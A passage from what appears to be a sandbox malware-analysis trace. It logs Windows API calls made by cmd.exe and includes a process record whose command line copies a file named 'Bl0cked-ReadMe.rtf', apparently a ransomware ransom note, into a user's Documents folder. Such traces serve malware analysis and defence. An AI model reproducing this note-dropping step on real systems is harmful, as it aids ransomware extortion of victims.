1 [0142.336] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.336] ReadFile (in: hFile=0x54, lpBuffer=0x1eede0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1edfd0, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesRead=0x1edfd0*=0x200, lpOverlapped=0x0) returned 1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] GetFileType (hFile=0x4c) returned 0x1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] GetFileType (hFile=0x4c) returned 0x1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] WriteFile (in: hFile=0x4c, lpBuffer=0x1eede0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] GetFileType (hFile=0x4c) returned 0x1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee30*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] GetFileType (hFile=0x4c) returned 0x1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee80*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] GetFileType (hFile=0x4c) returned 0x1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eeed0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] GetFileType (hFile=0x4c) returned 0x1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef20*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] GetFileType (hFile=0x4c) returned 0x1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef70*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] GetFileType (hFile=0x4c) returned 0x1 [0142.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.337] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefc0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eefc0*, lpNumberOfBytesWritten=0x1edfc4*=0x20, lpOverlapped=0x0) returned 1 [0142.337] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.337] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edfb0 | out: lpNewFilePointer=0x0) returned 1 [0142.338] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.338] ReadFile (in: hFile=0x54, lpBuffer=0x1eede0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1edfd0, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesRead=0x1edfd0*=0x200, lpOverlapped=0x0) returned 1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] GetFileType (hFile=0x4c) returned 0x1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] GetFileType (hFile=0x4c) returned 0x1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] WriteFile (in: hFile=0x4c, lpBuffer=0x1eede0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] GetFileType (hFile=0x4c) returned 0x1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee30*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] GetFileType (hFile=0x4c) returned 0x1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee80*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] GetFileType (hFile=0x4c) returned 0x1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eeed0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] GetFileType (hFile=0x4c) returned 0x1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef20*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] GetFileType (hFile=0x4c) returned 0x1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef70*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] GetFileType (hFile=0x4c) returned 0x1 [0142.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.338] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefc0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eefc0*, lpNumberOfBytesWritten=0x1edfc4*=0x20, lpOverlapped=0x0) returned 1 [0142.339] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.339] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edfb0 | out: lpNewFilePointer=0x0) returned 1 [0142.339] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.339] ReadFile (in: hFile=0x54, lpBuffer=0x1eede0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1edfd0, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesRead=0x1edfd0*=0x200, lpOverlapped=0x0) returned 1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] GetFileType (hFile=0x4c) returned 0x1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] GetFileType (hFile=0x4c) returned 0x1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] WriteFile (in: hFile=0x4c, lpBuffer=0x1eede0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] GetFileType (hFile=0x4c) returned 0x1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee30*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] GetFileType (hFile=0x4c) returned 0x1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee80*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] GetFileType (hFile=0x4c) returned 0x1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eeed0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] GetFileType (hFile=0x4c) returned 0x1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef20*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] GetFileType (hFile=0x4c) returned 0x1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef70*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] GetFileType (hFile=0x4c) returned 0x1 [0142.339] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.339] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefc0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eefc0*, lpNumberOfBytesWritten=0x1edfc4*=0x20, lpOverlapped=0x0) returned 1 [0142.340] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.340] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edfb0 | out: lpNewFilePointer=0x0) returned 1 [0142.340] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.340] ReadFile (in: hFile=0x54, lpBuffer=0x1eede0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1edfd0, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesRead=0x1edfd0*=0x32, lpOverlapped=0x0) returned 1 [0142.340] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.340] GetFileType (hFile=0x4c) returned 0x1 [0142.340] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.340] GetFileType (hFile=0x4c) returned 0x1 [0142.340] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.340] WriteFile (in: hFile=0x4c, lpBuffer=0x1eede0*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesWritten=0x1edfc4*=0x32, lpOverlapped=0x0) returned 1 [0142.340] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.340] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edfb0 | out: lpNewFilePointer=0x0) returned 1 [0142.340] _close (_FileHandle=4) returned 0 [0142.340] FindNextFileW (in: hFindFile=0x220e50, lpFindFileData=0x1ef044 | out: lpFindFileData=0x1ef044) returned 0 [0142.341] GetLastError () returned 0x12 [0142.341] FindClose (in: hFindFile=0x220e50 | out: hFindFile=0x220e50) returned 1 [0142.341] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0142.548] _close (_FileHandle=3) returned 0 [0142.548] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.548] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.548] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.548] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.548] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.548] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.548] SetConsoleInputExeNameW () returned 0x1 [0142.548] GetConsoleOutputCP () returned 0x1b5 [0142.549] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.549] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.549] exit (_Code=0) Process: id = "153" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16180" os_pid = "0x728" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14556 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14557 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14558 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14559 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 14560 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14561 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14562 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14563 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14564 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 14565 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15714 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15715 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15716 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15717 start_va = 0x250000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 15718 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 15719 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15720 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15721 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15722 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15723 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15724 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15725 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15726 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15727 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15728 start_va = 0x260000 end_va = 0x327fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 15729 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15730 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15731 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15732 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 15733 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 15734 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 15735 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 15736 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 15737 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 209 os_tid = 0x110 [0140.514] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efa3c | out: lpSystemTimeAsFileTime=0x1efa3c*(dwLowDateTime=0x8daf36e0, dwHighDateTime=0x1d440a9)) [0140.514] GetCurrentProcessId () returned 0x728 [0140.514] GetCurrentThreadId () returned 0x110 [0140.514] GetTickCount () returned 0x2c1c8 [0140.514] QueryPerformanceCounter (in: lpPerformanceCount=0x1efa34 | out: lpPerformanceCount=0x1efa34*=19730337982) returned 1 [0140.523] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.523] __set_app_type (_Type=0x1) [0140.523] __p__fmode () returned 0x76b331f4 [0140.523] __p__commode () returned 0x76b331fc [0140.523] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.523] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.523] GetCurrentThreadId () returned 0x110 [0140.523] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x110) returned 0x38 [0140.523] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.523] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.523] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.524] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.524] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ef9cc | out: phkResult=0x1ef9cc*=0x0) returned 0x2 [0140.524] VirtualQuery (in: lpAddress=0x1efa03, lpBuffer=0x1ef99c, dwLength=0x1c | out: lpBuffer=0x1ef99c*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.524] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1ef99c, dwLength=0x1c | out: lpBuffer=0x1ef99c*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.524] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1ef99c, dwLength=0x1c | out: lpBuffer=0x1ef99c*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.524] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1ef99c, dwLength=0x1c | out: lpBuffer=0x1ef99c*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.524] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1ef99c, dwLength=0x1c | out: lpBuffer=0x1ef99c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.524] GetConsoleOutputCP () returned 0x1b5 [0140.524] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.524] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.524] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.524] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.525] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.525] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.525] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.525] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.525] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.525] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.525] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.525] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.525] GetEnvironmentStringsW () returned 0x380198* [0140.526] FreeEnvironmentStringsW (penv=0x380198) returned 1 [0140.526] GetEnvironmentStringsW () returned 0x380198* [0140.526] FreeEnvironmentStringsW (penv=0x380198) returned 1 [0140.526] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee93c | out: phkResult=0x1ee93c*=0x40) returned 0x0 [0140.526] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x0, lpData=0x1ee948*=0xc0, lpcbData=0x1ee940*=0x1000) returned 0x2 [0140.526] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x4, lpData=0x1ee948*=0x1, lpcbData=0x1ee940*=0x4) returned 0x0 [0140.526] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x0, lpData=0x1ee948*=0x1, lpcbData=0x1ee940*=0x1000) returned 0x2 [0140.526] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x4, lpData=0x1ee948*=0x0, lpcbData=0x1ee940*=0x4) returned 0x0 [0140.526] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x4, lpData=0x1ee948*=0x40, lpcbData=0x1ee940*=0x4) returned 0x0 [0140.526] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x4, lpData=0x1ee948*=0x40, lpcbData=0x1ee940*=0x4) returned 0x0 [0140.526] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x0, lpData=0x1ee948*=0x40, lpcbData=0x1ee940*=0x1000) returned 0x2 [0140.526] RegCloseKey (hKey=0x40) returned 0x0 [0140.526] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee93c | out: phkResult=0x1ee93c*=0x40) returned 0x0 [0140.526] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x0, lpData=0x1ee948*=0x40, lpcbData=0x1ee940*=0x1000) returned 0x2 [0140.526] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x4, 